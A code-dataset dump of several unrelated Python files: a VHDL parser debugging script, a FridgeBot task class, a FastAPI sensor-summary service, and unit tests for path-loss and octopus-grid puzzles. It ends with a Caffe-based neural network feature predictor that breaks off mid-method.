StarcoderdataPython
|
4899831
|
# EMACS settings: -*- tab-width: 2; indent-tabs-mode: t; python-indent-offset: 2 -*-
# vim: tabstop=2:shiftwidth=2:noexpandtab
# kate: tab-width 2; replace-tabs off; indent-width 2;
# ==============================================================================
# Authors: <NAME>
#
# Python functions: A streaming VHDL parser
#
# Description:
# ------------------------------------
# TODO:
#
# License:
# ==============================================================================
# Copyright 2007-2017 <NAME> - Dresden, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
#
# load dependencies
from pathlib import Path
import sys
import pyVHDLParser.Blocks.InterfaceObject
from pyVHDLParser.Base import ParserException
from pyVHDLParser.Token import StartOfDocumentToken, EndOfDocumentToken, CharacterToken, SpaceToken, StringToken, LinebreakToken, CommentToken, IndentationToken, Token
from pyVHDLParser.Token.Keywords import BoundaryToken, EndToken, KeywordToken, DelimiterToken, IdentifierToken
from pyVHDLParser.Blocks import CommentBlock, Block, StartOfDocumentBlock, EndOfDocumentBlock, MetaBlock
from pyVHDLParser.Blocks.Common import LinebreakBlock, IndentationBlock
from pyVHDLParser.Blocks.Structural import Entity
from pyVHDLParser.Blocks.List import GenericList, PortList
from pyVHDLParser.Functions import Console, Exit
Console.init()
for block in MetaBlock.BLOCKS:
try:
block.__cls_init__()
except AttributeError:
pass
rootDirectory = Path(".")
vhdlDirectory = rootDirectory / "vhdl"
if (len(sys.argv) == 2):
file = Path(sys.argv[1])
mode = 255
elif (len(sys.argv) == 3):
file = Path(sys.argv[1])
mode = int(sys.argv[2])
print("mode={0}".format(mode))
else:
print("File name expected.")
Exit.exit(-1)
if (not file.exists()):
print("File '{0!s}' does not exist.".format(file))
with file.open('r') as fileHandle:
content = fileHandle.read()
# ==============================================================================
if (mode & 6 == 2):
from pyVHDLParser.Token.Parser import Tokenizer
print("{RED}{line}{NOCOLOR}".format(line="="*160, **Console.Foreground))
vhdlTokenStream = Tokenizer.GetVHDLTokenizer(content)
try:
for vhdlToken in vhdlTokenStream:
if isinstance(vhdlToken, (LinebreakToken, SpaceToken, IndentationToken)):
print("{DARK_GRAY}{block}{NOCOLOR}".format(block=vhdlToken, **Console.Foreground))
elif isinstance(vhdlToken, CommentToken):
print("{DARK_GREEN}{block}{NOCOLOR}".format(block=vhdlToken, **Console.Foreground))
elif isinstance(vhdlToken, CharacterToken):
print("{DARK_CYAN}{block}{NOCOLOR}".format(block=vhdlToken, **Console.Foreground))
elif isinstance(vhdlToken, StringToken):
print("{WHITE}{block}{NOCOLOR}".format(block=vhdlToken, **Console.Foreground))
elif isinstance(vhdlToken, (StartOfDocumentToken, EndOfDocumentToken)):
print("{YELLOW}{block}{NOCOLOR}".format(block=vhdlToken, **Console.Foreground))
else:
print("{RED}{block}{NOCOLOR}".format(block=vhdlToken, **Console.Foreground))
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
if (mode & 1 == 1):
print("{RED}{line}{NOCOLOR}".format(line="=" * 160, **Console.Foreground))
vhdlTokenStream = Tokenizer.GetVHDLTokenizer(content)
try:
tokenIterator = iter(vhdlTokenStream)
firstToken = next(tokenIterator)
if (not isinstance(firstToken, StartOfDocumentToken)):
print("{RED}First block is not StartOfDocumentToken: {token}{NOCOLOR}".format(token=firstToken, **Console.Foreground))
lastToken = None
vhdlToken = firstToken
for newToken in tokenIterator:
if (vhdlToken.NextToken is None):
print("{RED}Token has an open end.{NOCOLOR}".format(**Console.Foreground))
print("{RED} Token: {token}{NOCOLOR}".format(token=vhdlToken, **Console.Foreground))
elif ((vhdlToken is not firstToken) and (lastToken.NextToken is not vhdlToken)):
print("{RED}Last token is not connected to the current token.{NOCOLOR}".format(**Console.Foreground))
print("{RED} Curr: {token}{NOCOLOR}".format(token=vhdlToken, **Console.Foreground))
print("{DARK_RED} Prev: {token}{NOCOLOR}".format(token=vhdlToken.PreviousToken, **Console.Foreground))
print("{RED} Last: {token}{NOCOLOR}".format(token=lastToken, **Console.Foreground))
print("{RED} Next: {token}{NOCOLOR}".format(token=lastToken.NextToken, **Console.Foreground))
if (lastToken.NextToken is None):
print("{DARK_RED} Next: {token}{NOCOLOR}".format(token="--------", **Console.Foreground))
else:
print("{DARK_RED} Next: {token}{NOCOLOR}".format(token=lastToken.NextToken.NextToken, **Console.Foreground))
if (vhdlToken.PreviousToken is None):
print("{DARK_RED} Prev: {token}{NOCOLOR}".format(token="--------", **Console.Foreground))
else:
print("{DARK_RED} Prev: {token}{NOCOLOR}".format(token=vhdlToken.PreviousToken.PreviousToken, **Console.Foreground))
elif (vhdlToken.PreviousToken is not lastToken):
print("{RED}Current token is not connected to lastToken.{NOCOLOR}".format(**Console.Foreground))
print("{RED} Curr: {token}{NOCOLOR}".format(token=vhdlToken, **Console.Foreground))
print("{RED} Prev: {token}{NOCOLOR}".format(token=vhdlToken.PreviousToken, **Console.Foreground))
print("{RED} Last: {token}{NOCOLOR}".format(token=lastToken, **Console.Foreground))
print("{DARK_RED} Next: {token}{NOCOLOR}".format(token=lastToken.NextToken, **Console.Foreground))
lastToken = vhdlToken
vhdlToken = newToken
if isinstance(newToken, EndOfDocumentToken):
break
else:
print("{RED}No EndOfDocumentToken found.{NOCOLOR}".format(**Console.Foreground))
if (not isinstance(vhdlToken, EndOfDocumentToken)):
print("{RED}Last token is not EndOfDocumentToken: {token}{NOCOLOR}".format(token=lastToken, **Console.Foreground))
elif (vhdlToken.PreviousToken is not lastToken):
print("{RED}EndOfDocumentToken is not connected to lastToken.{NOCOLOR}".format(**Console.Foreground))
print("{RED} Curr: {token}{NOCOLOR}".format(token=vhdlToken, **Console.Foreground))
print("{RED} Prev: {token}{NOCOLOR}".format(token=vhdlToken.PreviousToken, **Console.Foreground))
print("{RED} Last: {token}{NOCOLOR}".format(token=lastToken, **Console.Foreground))
print("{DARK_RED} Next: {token}{NOCOLOR}".format(token=lastToken.NextToken, **Console.Foreground))
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
# ==============================================================================
if (mode & 6 == 4):
from pyVHDLParser.Token.Parser import Tokenizer
from pyVHDLParser.Blocks import TokenToBlockParser
print("{RED}{line}{NOCOLOR}".format(line="="*160, **Console.Foreground))
vhdlTokenStream = Tokenizer.GetVHDLTokenizer(content)
vhdlBlockStream = TokenToBlockParser.Transform(vhdlTokenStream, debug=(mode & 1 == 1))
try:
for vhdlBlock in vhdlBlockStream:
if isinstance(vhdlBlock, (LinebreakBlock, IndentationBlock)):
print("{DARK_GRAY}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
elif isinstance(vhdlBlock, CommentBlock):
print("{DARK_GREEN}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
elif isinstance(vhdlBlock, (Entity.NameBlock, Entity.NameBlock, Entity.EndBlock)):
print("{DARK_RED}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
elif isinstance(vhdlBlock, (GenericList.OpenBlock, GenericList.DelimiterBlock, GenericList.CloseBlock)):
print("{DARK_BLUE}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
elif isinstance(vhdlBlock, (PortList.OpenBlock, PortList.DelimiterBlock, PortList.CloseBlock)):
print("{DARK_CYAN}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
elif isinstance(vhdlBlock, (pyVHDLParser.Blocks.InterfaceObject.InterfaceConstantBlock, pyVHDLParser.Blocks.InterfaceObject.InterfaceSignalBlock)):
print("{BLUE}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
else:
print("{YELLOW}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
if (mode & 6 == 6):
from pyVHDLParser.Token.Parser import Tokenizer
from pyVHDLParser.Blocks import TokenToBlockParser
print("{RED}{line}{NOCOLOR}".format(line="="*160, **Console.Foreground))
vhdlTokenStream = Tokenizer.GetVHDLTokenizer(content)
vhdlBlockStream = TokenToBlockParser.Transform(vhdlTokenStream, debug=(mode & 1 == 1))
try:
blockIterator = iter(vhdlBlockStream)
firstBlock = next(blockIterator)
if (not isinstance(firstBlock, StartOfDocumentBlock)):
print("{RED}First block is not StartOfDocumentBlock: {block}{NOCOLOR}".format(block=firstBlock, **Console.Foreground))
elif (not isinstance(firstBlock.StartToken, StartOfDocumentToken)):
print("{RED}First block is not StartOfDocumentToken: {token}{NOCOLOR}".format(token=firstBlock.StartToken, **Console.Foreground))
lastBlock : Block = firstBlock
endBlock : Block = None
lastToken : Token = firstBlock.StartToken
for vhdlBlock in blockIterator:
if isinstance(vhdlBlock, EndOfDocumentBlock):
endBlock = vhdlBlock
break
tokenIterator = iter(vhdlBlock)
relTokenPosition = 0
for token in tokenIterator:
relTokenPosition += 1
if (token.NextToken is None):
print("{RED}Token({pos}) has an open end.{NOCOLOR}".format(pos=relTokenPosition, **Console.Foreground))
print("{RED} Block: {block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
print("{RED} Token: {token}{NOCOLOR}".format(token=token, **Console.Foreground))
elif (lastToken.NextToken is not token):
print("{RED}Last token is not connected to the current ({pos}) one.{NOCOLOR}".format(pos=relTokenPosition, **Console.Foreground))
token11 = lastToken
token21 = lastToken.NextToken
token31 = "--------" if (lastToken.NextToken is None) else lastToken.NextToken.NextToken
token41 = "--------" if (lastToken.NextToken.NextToken is None) else lastToken.NextToken.NextToken.NextToken
token12 = "--------" if (token.PreviousToken.PreviousToken is None) else token.PreviousToken.PreviousToken.PreviousToken
token22 = "--------" if (token.PreviousToken is None) else token.PreviousToken.PreviousToken
token32 = token.PreviousToken
token42 = token
print("{RED} Block: {block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
print("{RED} | Last: {token1}{NOCOLOR} =?= {DARK_RED}Prev: {token2}{NOCOLOR}".format(token1=token11, token2=token12, **Console.Foreground))
print("{DARK_RED} | Next: {token1}{NOCOLOR} =?= {DARK_RED}Prev: {token2}{NOCOLOR}".format(token1=token21, token2=token22, **Console.Foreground))
print("{DARK_RED} | Next: {token1}{NOCOLOR} =?= {DARK_RED}Prev: {token2}{NOCOLOR}".format(token1=token31, token2=token32, **Console.Foreground))
print("{DARK_RED} v Next: {token1}{NOCOLOR} =?= {RED}Curr: {token2}{NOCOLOR}".format(token1=token41, token2=token42, **Console.Foreground))
elif (token.PreviousToken is not lastToken):
print("{RED}Current token is not connected to lastToken.{NOCOLOR}".format(**Console.Foreground))
print("{RED} Block: {block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
print("{RED} Last: {token}{NOCOLOR}".format(token=lastToken, **Console.Foreground))
print("{DARK_RED} Next: {token}{NOCOLOR}".format(token=lastToken.NextToken, **Console.Foreground))
print("{RED} Curr: {token}{NOCOLOR}".format(token=token, **Console.Foreground))
print("{RED} Prev: {token}{NOCOLOR}".format(token=token.PreviousToken, **Console.Foreground))
lastToken = token
lastBlock = vhdlBlock
else:
print("{RED}No EndOfDocumentBlock found.{NOCOLOR}".format(**Console.Foreground))
if (not isinstance(endBlock, EndOfDocumentBlock)):
print("{RED}Last block is not EndOfDocumentBlock: {block}{NOCOLOR}".format(block=endBlock, **Console.Foreground))
elif (not isinstance(endBlock.StartToken, EndOfDocumentToken)):
print("{RED}Last token is not EndOfDocumentToken: {token}{NOCOLOR}".format(token=endBlock.StartToken, **Console.Foreground))
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
# ==============================================================================
print("{RED}{line}{NOCOLOR}".format(line="="*160, **Console.Foreground))
vhdlTokenStream = Tokenizer.GetVHDLTokenizer(content)
vhdlBlockStream = TokenToBlockParser.Transform(vhdlTokenStream, debug=(mode & 1 == 1))
try:
for vhdlBlock in vhdlBlockStream:
print("{YELLOW}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
for token in vhdlBlock:
if isinstance(token, (IndentationToken, LinebreakToken, BoundaryToken, DelimiterToken, EndToken)):
print("{DARK_GRAY} {token}{NOCOLOR}".format(token=token, **Console.Foreground))
elif isinstance(token, (CommentToken)):
print("{DARK_GREEN} {token}{NOCOLOR}".format(token=token, **Console.Foreground))
elif isinstance(token, KeywordToken):
print("{DARK_CYAN} {token}{NOCOLOR}".format(token=token, **Console.Foreground))
elif isinstance(token, (StringToken, CharacterToken)):
print("{DARK_GREEN} {token}{NOCOLOR}".format(token=token, **Console.Foreground))
elif isinstance(token, (IdentifierToken)):
print("{GREEN} {token}{NOCOLOR}".format(token=token, **Console.Foreground))
else:
print("{RED} {token}{NOCOLOR}".format(token=token, **Console.Foreground))
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
# ==============================================================================
if (mode & 8 == 8):
from pyVHDLParser.Token.Parser import Tokenizer
from pyVHDLParser.Blocks import TokenToBlockParser
from pyVHDLParser.Groups import BlockToGroupParser, StartOfDocumentGroup, EndOfDocumentGroup, Group
print("{RED}{line}{NOCOLOR}".format(line="="*160, **Console.Foreground))
try:
vhdlTokenStream = [token for token in Tokenizer.GetVHDLTokenizer(content)]
vhdlBlockStream = [block for block in TokenToBlockParser.Transform(vhdlTokenStream)]
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
vhdlGroupStream = BlockToGroupParser.Transform(vhdlBlockStream, debug=(mode & 1 == 1))
try:
for vhdlGroup in vhdlGroupStream:
print("{CYAN}{block}{NOCOLOR}".format(block=vhdlGroup, **Console.Foreground))
for block in vhdlGroup:
if isinstance(block, (IndentationToken, LinebreakToken, BoundaryToken, DelimiterToken, EndToken)):
print("{DARK_GRAY} {block}{NOCOLOR}".format(block=block, **Console.Foreground))
elif isinstance(block, (CommentToken)):
print("{DARK_GREEN} {block}{NOCOLOR}".format(block=block, **Console.Foreground))
elif isinstance(block, KeywordToken):
print("{DARK_CYAN} {block}{NOCOLOR}".format(block=block, **Console.Foreground))
elif isinstance(block, (StringToken, SpaceToken, CharacterToken)):
print("{DARK_GREEN} {block}{NOCOLOR}".format(block=block, **Console.Foreground))
else:
print("{YELLOW} {block}{NOCOLOR}".format(block=block, **Console.Foreground))
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
# ==============================================================================
if (mode & 16 == 16):
from pyVHDLParser.Token.Parser import Tokenizer
from pyVHDLParser.Blocks import TokenToBlockParser
from pyVHDLParser.Groups import BlockToGroupParser, StartOfDocumentGroup, EndOfDocumentGroup, Group
print("{RED}{line}{NOCOLOR}".format(line="="*160, **Console.Foreground))
vhdlTokenStream = Tokenizer.GetVHDLTokenizer(content)
vhdlBlockStream = TokenToBlockParser.Transform(vhdlTokenStream)
vhdlGroupStream = BlockToGroupParser.Transform(vhdlBlockStream)
groups = [group for group in vhdlGroupStream]
firstGroup = groups[0]
lastGroup = groups[-1]
if (not isinstance(firstGroup, StartOfDocumentGroup)):
raise GroupParserException("Expected group is not a StartOfDocumentGroup.", firstGroup)
elif (not isinstance(lastGroup, EndOfDocumentGroup)):
raise GroupParserException("Expected group is not an EndOfDocumentGroup.", lastGroup)
# def _CategoryIterator(categories):
def validate(group : Group):
innerGroup = group.InnerGroup
while innerGroup is not None:
validate(innerGroup)
# if group registered?
if innerGroup.__class__ in group._subGroups:
if innerGroup not in group._subGroups[innerGroup.__class__]:
print("innerGroup '{0}' is not listed in _subGroups of '{1}'.".format(innerGroup, group))
else:
print("innerGroup '{0}' is not supported in group '{1}'".format(innerGroup, group))
innerGroup = innerGroup.NextGroup
validate(firstGroup)
# wordTokenStream = Tokenizer.GetWordTokenizer(content)
# vhdlBlockStream = TokenToBlockParser.Transform(wordTokenStream, debug=(mode & 1 == 1))
# strippedBlockStream = StripAndFuse(vhdlBlockStream)
#
# try:
# for vhdlBlock in strippedBlockStream:
# if isinstance(vhdlBlock, (LinebreakBlock, IndentationBlock)):
# print("{DARK_GRAY}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
# elif isinstance(vhdlBlock, CommentBlock):
# print("{DARK_GREEN}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
# elif isinstance(vhdlBlock, (Entity.NameBlock, Entity.ConcurrentBeginBlock, Entity.EndBlock)):
# print("{DARK_RED}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
# elif isinstance(vhdlBlock, (GenericList.OpenBlock, GenericList.DelimiterBlock, GenericList.CloseBlock)):
# print("{DARK_BLUE}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
# elif isinstance(vhdlBlock, (PortList.OpenBlock, PortList.DelimiterBlock, PortList.CloseBlock)):
# print("{DARK_CYAN}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
# elif isinstance(vhdlBlock, (GenericList.ItemBlock, PortList.ItemBlock)):
# print("{BLUE}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
# else:
# print("{YELLOW}{block}{NOCOLOR}".format(block=vhdlBlock, **Console.Foreground))
#
# except ParserException as ex:
# print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
# except NotImplementedError as ex:
# print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
if (mode & 32 == 32):
from pyVHDLParser.DocumentModel import Document, GroupParserException, GroupParserException
try:
document = Document(file)
document.Parse()
document.Print(0)
except ParserException as ex:
print("{RED}ERROR: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
except NotImplementedError as ex:
print("{RED}NotImplementedError: {0!s}{NOCOLOR}".format(ex, **Console.Foreground))
|
StarcoderdataPython
|
11285824
|
from typing import List
from FridgeBot.PiCode.Tasks.Actions.IAction import IAction
from FridgeBot.PiCode.Tasks.Tasks.IFridgeTask import IFridgeTask
from FridgeBot.PiCode.Tasks.Filters.IIFilter import IFilter
class FridgeTask(IFridgeTask):
def __init__(self, filters: List[IFilter], action: IAction):
self._filters = filters
self._action = action
self._is_finished = False
def can_run(self) -> bool:
for single_filter in self._filters:
if not single_filter.filter():
return False
return True
def restart(self) -> None:
self._is_finished = False
for single_filter in self._filters:
single_filter.restart()
self._action.restart()
def is_finished(self) -> bool:
return self._is_finished
def run(self) -> None:
self._action.run()
self._is_finished = True
|
StarcoderdataPython
|
5069913
|
from typing import *
from fastapi import FastAPI, Depends
from humtemp.configuration import settings
from humtemp.database import BucketRepository, connect
from humtemp.dto import Observation, Summary
connect(
host=settings.humtemp_redis_host,
port=settings.humtemp_redis_port,
db=settings.humtemp_redis_db
)
app = FastAPI()
async def _get_repository() -> BucketRepository:
return BucketRepository(
bucket_offset=settings.bucket_offset,
bucket_duration=settings.bucket_duration
)
@app.post('/observation')
async def observation(
data: Observation,
repo: BucketRepository = Depends(_get_repository)):
repo.add_observation(data)
@app.get('/summary', response_model=List[Summary])
async def summary(
offset: int = -1,
repo: BucketRepository = Depends(_get_repository)) -> List[Summary]:
result = []
for key in repo.find_in_bucket(offset=offset):
entity = repo.get(key)
if entity is None:
continue
result.append(Summary(
lab_id=entity.lab_id,
avg_temp=entity.avg_temp,
avg_humidity=entity.avg_humidity
))
return result
|
StarcoderdataPython
|
4838386
|
import unittest
from walksignal.models import FreeSpaceModel
class TestFreeSpaceModel(unittest.TestCase):
def test_min_input(self):
model = FreeSpaceModel(1)
pl = model.path_loss(1)
self.assertEqual(pl, -27.55)
def test_one_mhz_one_km(self):
model = FreeSpaceModel(1000000)
pl = model.path_loss(1000)
self.assertEqual(pl, 152.45)
if __name__ == '__main__':
unittest.main()
|
StarcoderdataPython
|
11280488
|
from pathlib import Path
import pytest
from day11.main import silver, OctopusesGrid, gold
INPUT_PATH = Path(__file__).parent / "input.txt"
EXAMPLE_PATH = Path(__file__).parent / "example.txt"
@pytest.mark.parametrize(
"before_desc,after_desc",
[
(
"""
11111
19991
19191
19991
11111
""",
"""
34543
40004
50005
40004
34543
"""
),
(
"""
6594254334
3856965822
6375667284
7252447257
7468496589
5278635756
3287952832
7993992245
5957959665
6394862637
""",
"""
8807476555
5089087054
8597889608
8485769600
8700908800
6600088989
6800005943
0000007456
9000000876
8700006848
"""
),
]
)
def test_step(before_desc: str, after_desc: str):
assert OctopusesGrid.parse(before_desc).step() == OctopusesGrid.parse(after_desc)
def test_flash_counts():
assert OctopusesGrid.parse(EXAMPLE_PATH.read_text()).multi_step(10).flashes == 204
def test_silver_example():
assert silver(EXAMPLE_PATH) == 1656
def test_silver_star():
assert silver(INPUT_PATH) == 1691
def test_gold_example():
assert gold(EXAMPLE_PATH) == 195
def test_gold_star():
assert gold(INPUT_PATH) == 216
|
StarcoderdataPython
|
1726835
|
<filename>visual_dynamics/predictors/predictor_caffe.py
import os
import re
import numpy as np
from collections import OrderedDict
import caffe
from caffe.proto import caffe_pb2 as pb2
from . import net_caffe
from . import predictor
class CaffeNetPredictor(caffe.Net):
"""
Predicts output given the current inputs
inputs -> prediction
"""
def __init__(self, model_file, pretrained_file=None, prediction_name=None):
if pretrained_file is None:
caffe.Net.__init__(self, model_file, caffe.TEST)
else:
caffe.Net.__init__(self, model_file, pretrained_file, caffe.TEST)
self.prediction_name = prediction_name or self.outputs[0]
self.prediction_dim = self.blob(self.prediction_name).shape[1]
def predict(self, *inputs, **kwargs):
batch = self.blob(self.inputs[0]).data.ndim == inputs[0].ndim
if batch:
batch_size = len(inputs[0])
for input_ in inputs[1:]:
if input_ is None:
continue
assert batch_size == len(input_)
else:
batch_size = 1
inputs = list(inputs)
for i, input_ in enumerate(inputs):
if input_ is None:
continue
inputs[i] = input_[None, :]
inputs = tuple(inputs)
prediction_name = kwargs.get('prediction_name') or self.prediction_name
if self.batch_size != 1 and batch_size == 1:
for input_ in self.inputs:
blob = self.blob(input_)
blob.reshape(1, *blob.shape[1:])
self.reshape()
outs = self.forward_all(blobs=[prediction_name], end=prediction_name, **dict(zip(self.inputs, inputs)))
if self.batch_size != 1 and batch_size == 1:
for input_ in self.inputs:
blob = self.blob(input_)
blob.reshape(self.batch_size, *blob.shape[1:])
self.reshape()
predictions = outs[prediction_name]
if batch:
return predictions
else:
return np.squeeze(predictions, axis=0)
def jacobian(self, wrt_input_name, *inputs):
assert wrt_input_name in self.inputs
batch = len(self.blob(self.inputs[0]).data.shape) == len(inputs[0].shape)
wrt_input_shape = self.blob(wrt_input_name).data.shape
if batch:
batch_size = len(inputs[0])
for input_ in inputs[1:]:
if input_ is None:
continue
assert batch_size == len(input_)
else:
batch_size = 1
inputs = list(inputs)
for i, input_ in enumerate(inputs):
if input_ is None:
continue
inputs[i] = input_[None, :]
inputs = tuple(inputs)
_, wrt_input_dim = wrt_input_shape
inputs = list(inputs)
# use inputs with zeros for the inputs that are not specified
for i, (input_name, input_) in enumerate(zip(self.inputs, inputs)):
if input_ is None:
inputs[i] = np.zeros(self.blob(input_name).shape)
# use outputs with zeros for the outpus that doesn't affect the backward computation
output_diffs = dict()
for output_name in self.outputs:
if output_name == self.prediction_name:
output_diffs[output_name] = np.eye(self.prediction_dim)
else:
output_diffs[output_name] = np.zeros((self.prediction_dim,) + self.blob(output_name).diff.shape[1:])
jacs = np.empty((batch_size, self.prediction_dim, wrt_input_dim))
for k, input_ in enumerate(zip(*inputs)):
input_blobs = dict(zip(self.inputs, [np.repeat(in_[None, :], self.batch_size, axis=0) for in_ in input_]))
self.forward_all(blobs=[self.prediction_name], end=self.prediction_name, **input_blobs)
diffs = self.backward_all(diffs=[self.prediction_name], start=self.prediction_name, **output_diffs)
jacs[k, :, :] = diffs[wrt_input_name]
if batch:
return jacs
else:
return np.squeeze(jacs, axis=0)
def blob(self, blob_name):
return self._blobs[list(self._blob_names).index(blob_name)]
class CaffeNetFeaturePredictor(CaffeNetPredictor, predictor.FeaturePredictor):
"""
Predicts change in features (y_dot) given the current input image (x) and control (u):
x, u -> y_dot
"""
def __init__(self, net_func, input_shapes, input_names=None, output_names=None, pretrained_file=None, postfix='', batch_size=32):
"""
Assumes that outputs[0] is the prediction_name
batch_size_1: if True, another net_caffe of batch_size of 1 is created, and this net_caffe is used for computing forward in the predict method
"""
predictor.FeaturePredictor.__init__(self, *input_shapes, input_names=input_names, output_names=output_names, backend='caffe')
self.net_func = net_func
self.postfix = postfix
self.batch_size = batch_size
self.deploy_net_param, weight_fillers = net_func(input_shapes, batch_size=batch_size)
self.deploy_net_param = net_caffe.deploy_net(self.deploy_net_param, self.input_names, input_shapes, self.output_names, batch_size=batch_size)
self.net_name = str(self.deploy_net_param.name)
deploy_fname = self.get_model_fname('deploy')
with open(deploy_fname, 'w') as f:
f.write(str(self.deploy_net_param))
copy_weights_later = False
if pretrained_file is not None:
if type(pretrained_file) == list:
snapshot_prefix = self.get_snapshot_prefix()
snapshot_prefix.split('_')
this_levels = [token for token in snapshot_prefix.split('_') if token.startswith('levels')][0]
pretrained_levels = pretrained_file[0]
snapshot_prefix = '_'.join([pretrained_levels if token.startswith('levels') else token for token in snapshot_prefix.split('_')])
pretrained_file = snapshot_prefix + '_iter_' + pretrained_file[-1] + '.caffemodel'
if this_levels != pretrained_levels:
copy_weights_later = True
if not copy_weights_later and not pretrained_file.endswith('.caffemodel'):
pretrained_file = self.get_snapshot_prefix() + '_iter_' + pretrained_file + '.caffemodel'
CaffeNetPredictor.__init__(self, deploy_fname, pretrained_file=pretrained_file if not copy_weights_later else None, prediction_name=self.output_names[0])
if copy_weights_later:
deploy_fname = '_'.join([pretrained_levels if token.startswith('levels') else token for token in deploy_fname.split('_')])
pretrained_net = caffe.Net(deploy_fname, pretrained_file, caffe.TEST)
for param_name, param in self.params.items():
if param_name in pretrained_net.params:
for blob, pretrained_blob in zip(param, pretrained_net.params[param_name]):
if pretrained_blob.data.shape == blob.data.shape:
blob.data[...] = pretrained_blob.data
else:
blob.data[-pretrained_blob.data.shape[0]:, ...] = pretrained_blob.data # copy for second slice because of the concat layer
blob.data[:-pretrained_blob.data.shape[0], ...] *= 0.0
self.output_names = [name for name in self.output_names if name in self.blobs]
self.set_weight_fillers(self.params, weight_fillers)
self.train_net = None
self.val_net = None
def train(self, train_hdf5_fname, val_hdf5_fname=None, solverstate_fname=None, solver_param=None, batch_size=32, visualize_response_maps=False):
hdf5_txt_fnames = []
for hdf5_fname in [train_hdf5_fname, val_hdf5_fname]:
if hdf5_fname is not None:
head, tail = os.path.split(hdf5_fname)
root, _ = os.path.splitext(tail)
hdf5_txt_fname = os.path.join(head, '.' + root + '.txt')
if not os.path.isfile(hdf5_txt_fname):
with open(hdf5_txt_fname, 'w') as f:
f.write(hdf5_fname + '\n')
hdf5_txt_fnames.append(hdf5_txt_fname)
else:
hdf5_txt_fnames.append(None)
train_hdf5_txt_fname, val_hdf5_txt_fname = hdf5_txt_fnames
input_shapes = (self.x_shape, self.u_shape)
train_net_param, weight_fillers = self.net_func(input_shapes, train_hdf5_txt_fname, batch_size, self.net_name, phase=caffe.TRAIN)
if val_hdf5_fname is not None:
val_net_param, _ = self.net_func(input_shapes, val_hdf5_txt_fname, batch_size, self.net_name, phase=caffe.TEST)
self.train_val_net_param = train_net_param
if val_hdf5_fname is not None:
layers = [layer for layer in self.train_val_net_param.layer]
# remove layers except for data layers
for layer in layers:
if 'Data' not in layer.type:
self.train_val_net_param.layer.remove(layer)
# add data layers from validation net_caffe
self.train_val_net_param.layer.extend([layer for layer in val_net_param.layer if 'Data' in layer.type])
# add back the layers that are not data layers
self.train_val_net_param.layer.extend([layer for layer in layers if 'Data' not in layer.type])
self.train_val_net_param = net_caffe.train_val_net(self.train_val_net_param)
train_val_fname = self.get_model_fname('train_val')
with open(train_val_fname, 'w') as f:
f.write(str(self.train_val_net_param))
if solver_param is None:
solver_param = pb2.SolverParameter()
self.add_default_parameters(solver_param, val_net=val_hdf5_fname is not None)
solver_fname = self.get_model_fname('solver')
with open(solver_fname, 'w') as f:
f.write(str(solver_param))
solver = caffe.get_solver(solver_fname)
self.set_weight_fillers(solver.net.params, weight_fillers)
for param_name, param in self.params.items():
for blob, solver_blob in zip(param, solver.net.params[param_name]):
solver_blob.data[...] = blob.data
if solverstate_fname is not None:
if not solverstate_fname.endswith('.solverstate'):
solverstate_fname = self.get_snapshot_prefix() + '_iter_' + solverstate_fname + '.solverstate'
solver.restore(solverstate_fname)
self.solve(solver, solver_param, visualize_response_maps=visualize_response_maps)
for param_name, param in self.params.items():
for blob, solver_blob in zip(param, solver.net.params[param_name]):
blob.data[...] = solver_blob.data
self.train_net = solver.net
if val_hdf5_fname is not None:
self.val_net = solver.test_nets[0]
